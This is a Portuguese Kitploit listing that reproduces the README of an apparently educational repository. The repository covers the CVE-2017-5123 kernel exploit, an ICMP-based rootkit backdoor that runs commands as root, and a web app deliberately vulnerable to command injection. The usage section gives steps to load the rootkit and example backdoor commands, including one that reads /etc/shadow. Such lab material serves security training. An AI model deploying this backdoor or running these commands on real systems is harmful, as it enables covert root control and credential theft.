Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2017-5123 — Demonstração educacional do exploit do kernel CVE-2017-5123, comando e controle de rootkit baseado em ICMP, e aplicação web vulnerável a injeção de comando do SO para treinamento em cibersegurança. | Kitploit
Ferramentas/GitHubGitHub/nabilboudra/cve-2017-5123
Escalada de PrivilégiosExploraçãoExploração de Aplicações WebComando e ControleAprendizado e EducaçãoDesenvolvimento de PayloadsExploração de BináriosLabs e Prática
GitHubnabilboudra/cve-2017-5123

cve-2017-5123

Demonstração educacional do exploit do kernel CVE-2017-5123, comando e controle de rootkit baseado em ICMP, e aplicação web vulnerável a injeção de comando do SO para treinamento em cibersegurança.

há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

CVE-2017-5123

Este repositório contém uma demonstração de CVE-2017-5123, um backdoor de comando e controle via ICMP, e uma aplicação web vulnerável a CWE-78 (Injeção de Comandos do SO).

Parte do CSC 4308 - Desafio 3.

Pré-requisitos

  • Kernel Linux: 4.13 até (mas excluindo) 4.13.7
  • Node.js: 10.x
  • npm: 6.x

Visão Geral

Este projeto demonstra três componentes distintos de pesquisa em segurança:

1. CVE-2017-5123 Exploit do Kernel (lkm/rootkit.c)

Um exploit de prova de conceito para a vulnerabilidade da chamada de sistema waitid introduzida no Kernel Linux 4.13. Essa vulnerabilidade permite escalonamento de privilégios e fuga de sandbox.

  • CVE ID: CVE-2017-5123
  • CWE ID: CWE-787 (Escrita fora dos limites)
  • Impacto: Escalonamento local de privilégios
  • Autor do Exploit: Chris Salls (@chris_salls)

2. Rootkit LKM do Kernel (lkm/lkm.c)

Um Módulo de Kernel Linux (LKM) malicioso que implementa um canal encoberto de comando e controle via pacotes ICMP echo (ping).

  • CWE ID: CWE-912 (Funcionalidade Oculta)
  • Funcionalidade:
    • Intercepta requisições ICMP echo com número de sequência 25678
    • Extrai comandos shell do payload ICMP
    • Executa comandos como root
    • Retorna a saída dos comandos via pacotes de resposta ICMP echo

3. Aplicação Web Vulnerável (vulnerable-app/)

Uma aplicação de compartilhamento de arquivos em React + Node.js vulnerável a injeção de comandos do SO.

  • CWE ID: CWE-78 (Injeção de Comandos do SO)
  • Fraqueza: Injeção de metacaracteres shell no campo de conteúdo do arquivo

4. Pinger de Dados ICMP (pinger/data-ping.c)

Uma utilidade para enviar requisições ICMP echo personalizadas com payloads customizados para se comunicar com o backdoor do rootkit do kernel.

Uso

Carregando o LKM

Compile o Módulo do Kernel

root@kitploit:~
cd lkm
make

Carregue o Módulo do Kernel

root@kitploit:~
sudo insmod lkm.ko

Compile o Cliente Pinger

root@kitploit:~
cd ../pinger
gcc -o data-ping data-ping.c

Envie Comandos via ICMP

root@kitploit:~
# Deve ser executado como root para usar sockets raw
sudo ./data-ping <target-ip> "whoami"
sudo ./data-ping localhost "ls -la /root"
sudo ./data-ping 192.168.1.100 "cat /etc/shadow"

Descarregue o Módulo

root@kitploit:~
sudo rmmod lkm

Recarregamento Rápido

root@kitploit:~
make reload

Executando a Aplicação Web Vulnerável

root@kitploit:~
# Compile o frontend
cd vulnerable-app/frontend
npm run build

# Copie o build para o backend
cp -r build ../backend/

# Inicie o servidor backend (serve tanto a API quanto o frontend)
cd ../backend
npm start

A aplicação estará disponível em http://localhost:3001

Referências

  • CVE-2017-5123: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5123
  • CWE-78: https://cwe.mitre.org/data/definitions/78.html
  • CWE-787: https://cwe.mitre.org/data/definitions/787.html
  • CWE-912: https://cwe.mitre.org/data/definitions/912.html
  • Código Original do Exploit de Chris Salls: https://github.com/salls/kernel-exploits
Baixar ferramenta